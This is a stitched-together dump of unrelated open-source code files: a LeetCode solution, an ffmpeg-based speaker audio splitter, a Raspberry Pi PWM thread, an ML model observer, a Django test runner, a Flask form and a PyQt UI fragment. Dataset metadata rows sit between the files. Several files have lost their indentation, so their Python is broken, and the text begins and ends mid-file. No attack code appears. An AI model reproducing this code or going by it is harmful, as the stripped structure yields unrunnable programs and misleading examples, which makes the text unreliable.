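        return self.currState, reward, done, {'noise': noise}

mdp = ToyMDP()
for n in [1, 1, -1, 1, 1, 1]:
    state, reward, done, info = mdp.step(1, force_noise=n)
print(state, done)  # -> 4 True
```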
# File: python-algorithm/leetcode/problem_457.py
# Repo: isudox/nerd-algorithm (MIT)
"""457. Circular Array Loop
https://leetcode.com/problems/circular-array-loop/
"""
from typing import List
class Solution:
def circular_array_loop(self, nums: List[int]) -> bool:
def helper(start: int, cur: int, count: int, visited) -> int:
if nums[cur] * nums[start] < 0:
return False
if cur == start and count > 0:
return count > 1
if cur in visited:
return False
visited.add(cur)
next_pos = cur + nums[cur]
count += 1
if 0 <= next_pos < len(nums):
return helper(start, next_pos, count, visited)
return helper(start, next_pos % len(nums), count, visited)
for i in range(len(nums)):
if helper(i, i, 0, set()):
return True
return False
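For a quick sanity check against the three LeetCode samples, the class is repeated verbatim below so the snippet runs on its own:

```python
from typing import List

class Solution:
    # Repeated from above so this check is self-contained.
    def circular_array_loop(self, nums: List[int]) -> bool:
        def helper(start: int, cur: int, count: int, visited) -> int:
            if nums[cur] * nums[start] < 0:
                return False
            if cur == start and count > 0:
                return count > 1
            if cur in visited:
                return False
            visited.add(cur)
            next_pos = cur + nums[cur]
            count += 1
            if 0 <= next_pos < len(nums):
                return helper(start, next_pos, count, visited)
            return helper(start, next_pos % len(nums), count, visited)

        for i in range(len(nums)):
            if helper(i, i, 0, set()):
                return True
        return False

sol = Solution()
print(sol.circular_array_loop([2, -1, 1, 2, 2]))     # -> True
print(sol.circular_array_loop([-1, 2]))              # -> False
print(sol.circular_array_loop([-2, 1, -1, -2, -2]))  # -> False
```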
# File: task/task2.py
# Repo: joseph9991/Milestone1 (MIT)
import pandas as pd
from pandas import read_csv
import os
import sys
import glob
import re
import soundfile as sf
import pyloudnorm as pyln
from .thdncalculator import execute_thdn
class Task2:
def __init__(self,data,file_name):
self.df = pd.DataFrame.from_dict(data, orient='columns')
self.file_name = file_name
self.speakers = []
self.speaker_set = ()
def merge_timestamp(self):
        '''
        Corrects a small error in the speaker end times obtained from the
        Task 1 response: each segment's end time is replaced with the next
        speaker's start time.
        '''
df_length = len(self.df.index)
cursor = 0
speaker_list = self.df['speaker'].values.tolist()
start_list = self.df['start_time'].values.tolist()
end_list = self.df['end_time'].values.tolist()
self.speaker_set = sorted(list(set(speaker_list)))
for i in range(0,len(speaker_list)):
current_row = []
current_speaker = speaker_list[i]
if cursor == 0:
current_row = [current_speaker,start_list[0],end_list[0]]
self.speakers.append(current_row)
cursor = cursor + 1
continue
            if current_speaker == speaker_list[i - 1]:  # same speaker continues
self.speakers[-1][2] = end_list[i]
else:
current_row = [current_speaker,start_list[i],end_list[i]]
self.speakers.append(current_row)
cursor = cursor + 1
for i in range(len(self.speakers)):
if i == len(self.speakers)-1:
break
self.speakers[i][2] = self.speakers[i+1][1]
print("\nComputed merged Timestamps for every speaker!!")
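The merge step above does two things: it collapses consecutive rows that share a speaker, then snaps each segment's end time to the next segment's start time. A standalone sketch of that collapse (list-of-rows in, list-of-rows out; the function name and row shape are illustrative, not the exact DataFrame code above):

```python
def merge_segments(rows):
    """rows: [(speaker, start, end), ...] in chronological order.
    Consecutive rows with the same speaker merge into one segment,
    and each segment's end is snapped to the next segment's start."""
    merged = []
    for speaker, start, end in rows:
        if merged and merged[-1][0] == speaker:
            merged[-1][2] = end          # extend the running segment
        else:
            merged.append([speaker, start, end])
    for i in range(len(merged) - 1):     # snap end -> next start
        merged[i][2] = merged[i + 1][1]
    return merged
```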
def trim(self):
        '''
        Trims the audio file into clips for each individual speaker using FFmpeg.
        There may be multiple files per speaker.
        OUTPUT: spk_0-1.wav, spk_0-2.wav, spk_0-3.wav
                spk_1-1.wav, spk_1-2.wav
                spk_2-1.wav, spk_2-2.wav
        '''
cursor = 0
for speaker in self.speakers:
new_file = speaker[0]+str(cursor)+'.wav'
command = f"ffmpeg -loglevel quiet -y -i {self.file_name} -ss {speaker[1]} -to \
{speaker[2]} -c:v copy -c:a copy {new_file}"
try:
os.system(command)
content = "file '{}'".format(new_file)
except Exception as err:
print(f'Error occurred: {err}')
cursor = cursor + 1
print("Divided audio file into {} individual speaker files!!".format(len(self.speakers)))
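Each segment becomes one FFmpeg stream-copy cut. Building the invocation as an argv list (instead of a formatted shell string, which `os.system` needs quoting for) avoids breaking on paths with spaces; this is a hypothetical helper sketching the equivalent command, not the exact string used above:

```python
def build_trim_command(src, start, end, dst):
    """Return an ffmpeg argv that stream-copies src between start and end."""
    return [
        "ffmpeg", "-loglevel", "quiet", "-y",
        "-i", src,
        "-ss", start, "-to", end,
        "-c", "copy",        # copy streams, no re-encode
        dst,
    ]
```

With `subprocess.run(build_trim_command(...))` there is no shell parsing at all, which is the usual reason to prefer this form.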
def generate_files(self):
        '''
        Merges each speaker's individual clips into one file per speaker.
        OUTPUT: spk_0.wav, spk_1.wav, spk_2.wav
        '''
txt_files = []
for i in range(len(self.speaker_set)):
fileName = '{}.txt'.format(self.speaker_set[i])
with open(fileName,'a+') as f:
txt_files.append(fileName)
wavFiles = glob.glob('{}*.wav'.format(self.speaker_set[i]))
convert = lambda text: int(text) if text.isdigit() else text
alphanum_key = lambda key: [convert(c) for c in re.split('([0-9]+)', key)]
wavFiles = sorted(wavFiles,key=alphanum_key)
for wavFile in wavFiles:
f.write('file \'{}\'\n'.format(wavFile))
# speaker_set = wavFiles
        # Concatenate each speaker's clips, then delete the helper text file
for txt_file in txt_files:
command = f"ffmpeg -loglevel quiet -y -f concat -i {txt_file} -c copy {txt_file[:-4]}.wav"
os.system(command)
os.remove(txt_file)
        ## Deleting the individual speaker audio clips [already merged above]
# for wav_file in glob.glob('spk_[0-4][0-9]*.wav'):
# os.remove(wav_file)
print("Merged the individual speaker files into {} files!!\n".format(len(self.speaker_set)))
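The `alphanum_key` lambda above is a standard natural-sort key: it splits a filename on digit runs so numeric parts compare as integers, putting `spk_0-2.wav` before `spk_0-10.wav`. The same key as a named function:

```python
import re


def natural_key(name):
    """Split digit runs out of name so numeric parts compare as ints."""
    return [int(tok) if tok.isdigit() else tok
            for tok in re.split(r"([0-9]+)", name)]
```

Note the capturing group in `re.split` is what keeps the digit runs in the result list instead of discarding them.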
def calculate_rank(self):
        '''
        Calculates the loudness and THDN value of each speaker's file.
        '''
speaker_loudness = {}
speaker_thdn = {}
speaker_frequency = {}
for speaker in self.speaker_set:
wav_file = speaker+'.wav'
data, rate = sf.read(wav_file)
print('Analyzing "' + wav_file + '"...')
meter = pyln.Meter(rate)
loudness = meter.integrated_loudness(data)
speaker_loudness[speaker] = loudness
response = execute_thdn(wav_file)
speaker_thdn[speaker] = response['thdn']
speaker_frequency[speaker] = response['frequency']
speaker_loudness = sorted( ((v,k) for k,v in speaker_loudness.items()), reverse=True)
print("\n\nThere is no \"better\" loudness. But the larger the value (closer to 0 dB), the louder. ")
print("--------------------------------------------------------------------------------------------")
print("Speaker\t\tLoudness\t\tTHDN\t\tFrequency\tRank")
print("--------------------------------------------------------------------------------------------")
for i in range(len(speaker_loudness)):
print('{}\t {} LUFS\t{}\t\t{}\t {}'.format(speaker_loudness[i][1], speaker_loudness[i][0],
speaker_thdn[speaker_loudness[i][1]], speaker_frequency[speaker_loudness[i][1]],i+1))
print("--------------------------------------------------------------------------------------------")
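The ranking uses the (value, key) inversion trick: flip the dict into `(loudness, speaker)` pairs and sort descending, so list index order is rank order. In isolation (the LUFS values here are made up for illustration):

```python
def rank_by_loudness(loudness_by_speaker):
    """Return [(loudness, speaker), ...] sorted loudest-first.
    Integrated loudness in LUFS is negative; closer to 0 dB is louder."""
    return sorted(((v, k) for k, v in loudness_by_speaker.items()),
                  reverse=True)
```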
def execute_all_functions(self):
print("\n\nCommencing Task 2: Judge Sound Quality")
self.merge_timestamp()
self.trim()
self.generate_files()
self.calculate_rank()
return self.speaker_set
# # For Testing
# if __name__ == "__main__":
# file_name = sys.argv[1]
# # Temp Code
# data =[
# {
# "Unnamed: 0": 0,
# "start_time": "00:00:00",
# "end_time": "00:00:00",
# "speaker": "spk_1",
# "comment": "Well,",
# "stopwords": 0,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 1,
# "start_time": "00:00:01",
# "end_time": "00:00:02",
# "speaker": "spk_1",
# "comment": "Hi, everyone.",
# "stopwords": 0,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 2,
# "start_time": "00:00:03",
# "end_time": "00:00:05",
# "speaker": "spk_0",
# "comment": "Everyone's money. Good",
# "stopwords": 0,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 3,
# "start_time": "00:00:05",
# "end_time": "00:00:10",
# "speaker": "spk_2",
# "comment": "morning, everyone. Money. Thanks for joining. Uh, so let's quickly get started with the meeting.",
# "stopwords": 4,
# "fillerwords": 1
# },
# {
# "Unnamed: 0": 4,
# "start_time": "00:00:11",
# "end_time": "00:00:14",
# "speaker": "spk_2",
# "comment": "Today's agenda is to discuss how we plan to increase the reach off our website",
# "stopwords": 8,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 5,
# "start_time": "00:00:15",
# "end_time": "00:00:20",
# "speaker": "spk_2",
# "comment": "and how to make it popular. Do you have any ideas, guys? Yes.",
# "stopwords": 8,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 6,
# "start_time": "00:00:20",
# "end_time": "00:00:22",
# "speaker": "spk_0",
# "comment": "Oh, Whoa. Um,",
# "stopwords": 0,
# "fillerwords": 1
# },
# {
# "Unnamed: 0": 7,
# "start_time": "00:00:23",
# "end_time": "00:00:36",
# "speaker": "spk_1",
# "comment": "it's okay. Thank you so much. Yes. Asai was saying one off. The ideas could be to make it more such friendly, you know? And to that I think we can. We need to improve the issue off our website.",
# "stopwords": 21,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 8,
# "start_time": "00:00:37",
# "end_time": "00:00:41",
# "speaker": "spk_2",
# "comment": "Yeah, that's a great point. We certainly need to improve the SC off our site.",
# "stopwords": 6,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 9,
# "start_time": "00:00:42",
# "end_time": "00:00:43",
# "speaker": "spk_2",
# "comment": "Let me let me take a note of this.",
# "stopwords": 4,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 10,
# "start_time": "00:00:45",
# "end_time": "00:00:57",
# "speaker": "spk_0",
# "comment": "How about using social media channels to promote our website? Everyone is on social media these days on way. We just need to target the right audience and share outside with them. Were often Oh, what do you think?",
# "stopwords": 18,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 11,
# "start_time": "00:00:58",
# "end_time": "00:01:05",
# "speaker": "spk_2",
# "comment": "It's definitely a great idea on since we already have our social accounts, I think we can get started on this one immediately.",
# "stopwords": 11,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 12,
# "start_time": "00:01:06",
# "end_time": "00:01:11",
# "speaker": "spk_0",
# "comment": "Yes, I can work on creating a plan for this. I come up with the content calendar base.",
# "stopwords": 9,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 13,
# "start_time": "00:01:11",
# "end_time": "00:01:17",
# "speaker": "spk_1",
# "comment": "Yeah, and I can start with creating the CEO content for all the periods off our website.",
# "stopwords": 10,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 14,
# "start_time": "00:01:17",
# "end_time": "00:01:24",
# "speaker": "spk_2",
# "comment": "Awesome. I think we already have a plan in place. Let's get rolling Eyes. Yeah, definitely.",
# "stopwords": 5,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 15,
# "start_time": "00:01:24",
# "end_time": "00:01:25",
# "speaker": "spk_2",
# "comment": "Yeah, sure.",
# "stopwords": 0,
# "fillerwords": 0
# },
# {
# "Unnamed: 0": 16,
# "start_time": "00:01:26",
# "end_time": "00:01:33",
# "speaker": "spk_2",
# "comment": "Great. Thanks. Thanks, everyone, for your ideas. I'm ending the call now. Talk to you soon. Bye. Bye bye. Thanks.",
# "stopwords": 5,
# "fillerwords": 0
# }]
# obj = Task2(data,file_name)
# obj.execute_all_functions() | 32.357988 | 241 | 0.526744 | 1,361 | 10,937 | 4.113152 | 0.25349 | 0.036442 | 0.032869 | 0.050018 | 0.115398 | 0.075027 | 0.014648 | 0.014648 | 0 | 0 | 0 | 0.046136 | 0.298437 | 10,937 | 338 | 242 | 32.357988 | 0.683435 | 0.526836 | 0 | 0.118812 | 0 | 0.019802 | 0.190847 | 0.073684 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.089109 | null | null | 0.118812 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1b46b1cb092d1e3618170f67ba0443c89c2d63b | 1,684 | py | Python | Firmware/RaspberryPi/backend-pi/PWMController.py | librerespire/ventilator | c0cfa63f1eae23c20d5d72fe52f42785070bbb3d | [
"MIT"
] | 5 | 2020-04-08T12:33:31.000Z | 2021-04-17T15:45:08.000Z | Firmware/RaspberryPi/backend-pi/PWMController.py | cmfsx/ventilator | 996dd5ad5010c19799e03576acf068663276a5e8 | [
"MIT"
] | 7 | 2020-03-27T13:16:09.000Z | 2020-06-24T11:15:59.000Z | Firmware/RaspberryPi/backend-pi/PWMController.py | cmfsx/ventilator | 996dd5ad5010c19799e03576acf068663276a5e8 | [
"MIT"
] | 2 | 2020-09-03T16:29:22.000Z | 2021-01-05T23:17:59.000Z | import threading
import time
import RPi.GPIO as GPIO
import logging
import logging.config
# declare logger parameters
logger = logging.getLogger(__name__)
class PWMController(threading.Thread):
""" Thread class with a stop() method.
Handy class to implement PWM on digital output pins """
def __init__(self, thread_id, pin, on_time, off_time):
threading.Thread.__init__(self)
self.__thread_id = thread_id
self.__pin = pin
self.__on_time = on_time
self.__off_time = off_time
self.__stop_event = threading.Event()
# TODO: Setting up the pins should be moved to the main script 'Controller.py'
# GPIO.setmode(GPIO.BCM)
# GPIO.setwarnings(False)
# GPIO.setup(pin, GPIO.OUT)
def stop(self):
self.__stop_event.set()
# print(str(self.__thread_id) + ": set the stop event")
def stopped(self):
return self.__stop_event.is_set()
def run(self):
while True:
if self.stopped():
# print(str(self.__thread_id) + ": thread has stopped. exiting")
                break
logger.debug(str(self.__pin) + ": ON--" + str(self.__on_time))
if self.__on_time > 0.02:
GPIO.output(self.__pin, GPIO.HIGH)
logger.debug("On wait time: %.3f" % self.__on_time)
time.sleep(self.__on_time)
logger.debug(str(self.__pin) + ": OFF--" + str(self.__off_time))
if self.__off_time > 0.02:
GPIO.output(self.__pin, GPIO.LOW)
logger.debug("Off wait time: %.3f" % self.__off_time)
time.sleep(self.__off_time)
| 33.68 | 86 | 0.600356 | 218 | 1,684 | 4.284404 | 0.334862 | 0.044968 | 0.053533 | 0.038544 | 0.147752 | 0.059957 | 0.059957 | 0.059957 | 0 | 0 | 0 | 0.006672 | 0.288005 | 1,684 | 49 | 87 | 34.367347 | 0.77231 | 0.226247 | 0 | 0 | 0 | 0 | 0.039002 | 0 | 0 | 0 | 0 | 0.020408 | 0 | 1 | 0.125 | false | 0 | 0.15625 | 0.03125 | 0.34375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
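The stop mechanism in `PWMController` — a `threading.Event` checked at the top of `run()` — is the standard pattern for a cooperatively stoppable thread. A minimal GPIO-free version of that pattern (the pin toggling is replaced by a counter so the sketch runs anywhere, not just on a Pi):

```python
import threading
import time


class StoppableWorker(threading.Thread):
    """Loop until stop() is called; `ticks` stands in for GPIO writes."""

    def __init__(self):
        super().__init__()
        self._stop_event = threading.Event()
        self.ticks = 0

    def stop(self):
        self._stop_event.set()

    def run(self):
        while not self._stop_event.is_set():
            self.ticks += 1      # would be GPIO.output(...) on real hardware
            time.sleep(0.001)
```

Callers start it, do their work, then call `stop()` followed by `join()`; because the loop only exits at the top of an iteration, the longest sleep in the body bounds how quickly the thread can shut down.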
a1bf1dc46f3a24ddc127c89f233fb631f8cdaefb | 3,474 | py | Python | Amplo/Observation/_model_observer.py | Amplo-GmbH/AutoML | eb6cc83b6e4a3ddc7c3553e9c41d236e8b48c606 | [
"MIT"
] | 5 | 2022-01-07T13:34:37.000Z | 2022-03-17T06:40:28.000Z | Amplo/Observation/_model_observer.py | Amplo-GmbH/AutoML | eb6cc83b6e4a3ddc7c3553e9c41d236e8b48c606 | [
"MIT"
] | 5 | 2022-03-22T13:42:22.000Z | 2022-03-31T16:20:44.000Z | Amplo/Observation/_model_observer.py | Amplo-GmbH/AutoML | eb6cc83b6e4a3ddc7c3553e9c41d236e8b48c606 | [
"MIT"
] | 1 | 2021-12-17T22:41:11.000Z | 2021-12-17T22:41:11.000Z | # Copyright by Amplo
"""
Observer for checking production readiness of model.
This part of the code is strongly inspired by [1].
References
----------
[1] E. Breck, C. Shanging, E. Nielsen, M. Salib, D. Sculley (2017).
The ML test score: A rubric for ML production readiness and technical debt
reduction. 1123-1132. 10.1109/BigData.2017.8258038.
"""
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from Amplo.Observation.base import PipelineObserver
from Amplo.Observation.base import _report_obs
__all__ = ["ModelObserver"]
class ModelObserver(PipelineObserver):
"""
Model observer before putting to production.
While the field of software engineering has developed a full range of best
practices for developing reliable software systems, similar best-practices
for ML model development are still emerging.
The following tests are included:
1. TODO: Model specs are reviewed and submitted.
2. TODO: Offline and online metrics correlate.
3. TODO: All hyperparameters have been tuned.
4. TODO: The impact of model staleness is known.
5. A simpler model is not better.
6. TODO: Model quality is sufficient on important data slices.
7. TODO: The model is tested for considerations of inclusion.
"""
TYPE = "model_observer"
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.xt, self.xv, self.yt, self.yv = train_test_split(
self.x, self.y, test_size=0.3, random_state=9276306)
def observe(self):
self.check_better_than_linear()
@_report_obs
def check_better_than_linear(self):
"""
Checks whether the model exceeds a linear model.
This test incorporates the test ``Model 5`` from [1].
Citation:
A simpler model is not better: Regularly testing against a very
simple baseline model, such as a linear model with very few
features, is an effective strategy both for confirming the
functionality of the larger pipeline and for helping to assess the
cost to benefit tradeoffs of more sophisticated techniques.
Returns
-------
status_ok : bool
Observation status. Indicates whether a warning should be raised.
message : str
A brief description of the observation and its results.
"""
# Make score for linear model
if self.mode == self.CLASSIFICATION:
linear_model = LogisticRegression()
elif self.mode == self.REGRESSION:
linear_model = LinearRegression()
else:
raise AssertionError("Invalid mode detected.")
linear_model.fit(self.xt, self.yt)
linear_model_score = self.scorer(linear_model, self.xv, self.yv)
# Make score for model to observe
obs_model = self.model
obs_model.fit(self.xt, self.yt)
obs_model_score = self.scorer(obs_model, self.xv, self.yv)
status_ok = obs_model_score > linear_model_score
message = ("Performance of a linear model should not exceed the "
"performance of the model to observe. "
f"Score for linear model: {linear_model_score:.4f}. "
f"Score for observed model: {obs_model_score:.4f}.")
return status_ok, message
| 36.957447 | 78 | 0.670409 | 450 | 3,474 | 5.055556 | 0.455556 | 0.067692 | 0.013187 | 0.019341 | 0.104615 | 0.038681 | 0 | 0 | 0 | 0 | 0 | 0.019775 | 0.257628 | 3,474 | 93 | 79 | 37.354839 | 0.86235 | 0.482153 | 0 | 0 | 0 | 0 | 0.147224 | 0.02932 | 0 | 0 | 0 | 0.064516 | 0.030303 | 1 | 0.090909 | false | 0 | 0.151515 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
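The "a simpler model is not better" check in `check_better_than_linear` reduces to comparing the candidate's validation score against a trivial baseline. The same gate without sklearn, using mean-squared error against a predict-the-mean baseline (all names here are illustrative, not part of the observer's API):

```python
def mse(y_true, y_pred):
    """Mean squared error of predictions against ground truth."""
    return sum((t - p) ** 2 for t, p in zip(y_true, y_pred)) / len(y_true)


def beats_baseline(y_true, model_pred):
    """True iff the model's MSE is lower than a constant-mean predictor's."""
    mean = sum(y_true) / len(y_true)
    baseline_pred = [mean] * len(y_true)
    return mse(y_true, model_pred) < mse(y_true, baseline_pred)
```

A model that merely matches the baseline fails the gate, which is the point: the check only passes when the extra complexity pays for itself on held-out data.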
a1c0825b266bca976c211fbcfde48bbcb725afd2 | 1,083 | py | Python | run_tests.py | dannybrowne86/django-ajax-uploader | 741213e38e9532dd83d8040af17169da9d610660 | [
"BSD-3-Clause"
] | 75 | 2015-02-09T22:49:57.000Z | 2021-01-31T23:47:39.000Z | run_tests.py | dannybrowne86/django-ajax-uploader | 741213e38e9532dd83d8040af17169da9d610660 | [
"BSD-3-Clause"
] | 13 | 2015-02-27T03:01:30.000Z | 2020-11-18T10:11:53.000Z | run_tests.py | dannybrowne86/django-ajax-uploader | 741213e38e9532dd83d8040af17169da9d610660 | [
"BSD-3-Clause"
] | 29 | 2015-02-09T22:50:16.000Z | 2019-12-25T06:41:43.000Z | # from https://github.com/django-extensions/django-extensions/blob/master/run_tests.py
from django.conf import settings
from django.core.management import call_command
def main():
# Dynamically configure the Django settings with the minimum necessary to
# get Django running tests
settings.configure(
INSTALLED_APPS=(
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.admin',
'django.contrib.sessions',
'ajaxuploader',
),
# Django replaces this, but it still wants it. *shrugs*
DATABASE_ENGINE = 'django.db.backends.sqlite3',
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
}
},
MEDIA_ROOT = '/tmp/ajaxuploader_test_media/',
MEDIA_PATH = '/media/',
ROOT_URLCONF = 'ajaxuploader.urls',
DEBUG = True,
TEMPLATE_DEBUG = True
)
# Fire off the tests
call_command('test', 'ajaxuploader')
if __name__ == '__main__':
main()
| 29.27027 | 86 | 0.600185 | 110 | 1,083 | 5.736364 | 0.590909 | 0.082409 | 0.044374 | 0.069731 | 0.091918 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002608 | 0.291782 | 1,083 | 36 | 87 | 30.083333 | 0.820078 | 0.234534 | 0 | 0 | 0 | 0 | 0.295261 | 0.159174 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | true | 0 | 0.076923 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1c400c5158580105326cc3e84bbb5b7fc61477c | 574 | py | Python | forms.py | qqalexqq/monkeys | df9a43adbda78da1f2ab1cc4c27819da4225d2e5 | [
"MIT"
] | null | null | null | forms.py | qqalexqq/monkeys | df9a43adbda78da1f2ab1cc4c27819da4225d2e5 | [
"MIT"
] | null | null | null | forms.py | qqalexqq/monkeys | df9a43adbda78da1f2ab1cc4c27819da4225d2e5 | [
"MIT"
] | null | null | null | from flask.ext.wtf import Form
from wtforms import (
TextField, IntegerField, HiddenField, SubmitField, validators
)
class MonkeyForm(Form):
id = HiddenField()
name = TextField('Name', validators=[validators.InputRequired()])
age = IntegerField(
'Age', validators=[
validators.InputRequired(message='Age should be an integer.'),
validators.NumberRange(min=0)
]
)
email = TextField(
'Email', validators=[validators.InputRequired(), validators.Email()]
)
submit_button = SubmitField('Submit')
| 27.333333 | 76 | 0.656794 | 53 | 574 | 7.09434 | 0.54717 | 0.159574 | 0.263298 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002247 | 0.224739 | 574 | 20 | 77 | 28.7 | 0.842697 | 0 | 0 | 0 | 0 | 0 | 0.074913 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.470588 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a1c5f16bf229bdace56e1e6f63c0ce9caaa232d9 | 10,362 | py | Python | View/pesquisa_produtos.py | felipezago/ControleEstoque | 229659c4f9888fd01df34375ec92af7a1f734d10 | [
"MIT"
] | null | null | null | View/pesquisa_produtos.py | felipezago/ControleEstoque | 229659c4f9888fd01df34375ec92af7a1f734d10 | [
"MIT"
] | null | null | null | View/pesquisa_produtos.py | felipezago/ControleEstoque | 229659c4f9888fd01df34375ec92af7a1f734d10 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'pesquisa_produtos.ui'
#
# Created by: PyQt5 View code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Frame(object):
def setupUi(self, Frame):
Frame.setObjectName("Frame")
Frame.resize(1048, 361)
Frame.setAutoFillBackground(False)
Frame.setStyleSheet("background: #FFF;")
self.fr_titulo_servicos = QtWidgets.QFrame(Frame)
self.fr_titulo_servicos.setGeometry(QtCore.QRect(0, 0, 1051, 60))
self.fr_titulo_servicos.setStyleSheet("")
self.fr_titulo_servicos.setObjectName("fr_titulo_servicos")
self.lb_tituloClientes_2 = QtWidgets.QLabel(self.fr_titulo_servicos)
self.lb_tituloClientes_2.setGeometry(QtCore.QRect(10, 15, 200, 30))
font = QtGui.QFont()
font.setFamily("DejaVu Sans")
font.setPointSize(18)
font.setBold(True)
font.setWeight(75)
self.lb_tituloClientes_2.setFont(font)
self.lb_tituloClientes_2.setStyleSheet("color: rgb(0, 0, 0)")
self.lb_tituloClientes_2.setObjectName("lb_tituloClientes_2")
self.bt_inserir = QtWidgets.QPushButton(self.fr_titulo_servicos)
self.bt_inserir.setGeometry(QtCore.QRect(910, 9, 131, 41))
font = QtGui.QFont()
font.setFamily("Tahoma")
font.setPointSize(10)
font.setBold(True)
font.setWeight(75)
self.bt_inserir.setFont(font)
self.bt_inserir.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.bt_inserir.setFocusPolicy(QtCore.Qt.NoFocus)
self.bt_inserir.setContextMenuPolicy(QtCore.Qt.ActionsContextMenu)
self.bt_inserir.setStyleSheet("QPushButton {\n"
" background-color: rgb(78, 154, 6);\n"
"color: #FFF\n"
" }\n"
"QPushButton:hover{\n"
" background-color: #40a286\n"
"}")
self.bt_inserir.setIconSize(QtCore.QSize(75, 35))
self.bt_inserir.setObjectName("bt_inserir")
self.tb_produtos = QtWidgets.QTableWidget(Frame)
self.tb_produtos.setGeometry(QtCore.QRect(0, 100, 1041, 211))
self.tb_produtos.viewport().setProperty("cursor", QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.tb_produtos.setFocusPolicy(QtCore.Qt.WheelFocus)
self.tb_produtos.setStyleSheet("QTableView{\n"
"color: #797979;\n"
"font-weight: bold;\n"
"font-size: 13px;\n"
"background: #FFF;\n"
"padding: 0 0 0 5px;\n"
"}\n"
"QHeaderView:section{\n"
"background: #FFF;\n"
"padding: 5px 0 ;\n"
"font-size: 12px;\n"
"font-family: \"Arial\";\n"
"font-weight: bold;\n"
"color: #797979;\n"
"border: none;\n"
"border-bottom: 2px solid #CCC;\n"
"text-transform: uppercase\n"
"}\n"
"QTableView::item {\n"
"border-bottom: 2px solid #CCC;\n"
"padding: 2px;\n"
"}\n"
"\n"
"")
self.tb_produtos.setFrameShape(QtWidgets.QFrame.NoFrame)
self.tb_produtos.setFrameShadow(QtWidgets.QFrame.Plain)
self.tb_produtos.setAutoScrollMargin(20)
self.tb_produtos.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.tb_produtos.setSelectionMode(QtWidgets.QAbstractItemView.NoSelection)
self.tb_produtos.setSelectionBehavior(QtWidgets.QAbstractItemView.SelectRows)
self.tb_produtos.setShowGrid(False)
self.tb_produtos.setGridStyle(QtCore.Qt.NoPen)
self.tb_produtos.setWordWrap(False)
self.tb_produtos.setRowCount(1)
self.tb_produtos.setObjectName("tb_produtos")
self.tb_produtos.setColumnCount(8)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setVerticalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(2, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(3, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(4, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(5, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(6, item)
item = QtWidgets.QTableWidgetItem()
self.tb_produtos.setHorizontalHeaderItem(7, item)
self.tb_produtos.horizontalHeader().setDefaultSectionSize(120)
self.tb_produtos.horizontalHeader().setHighlightSections(False)
self.tb_produtos.horizontalHeader().setStretchLastSection(True)
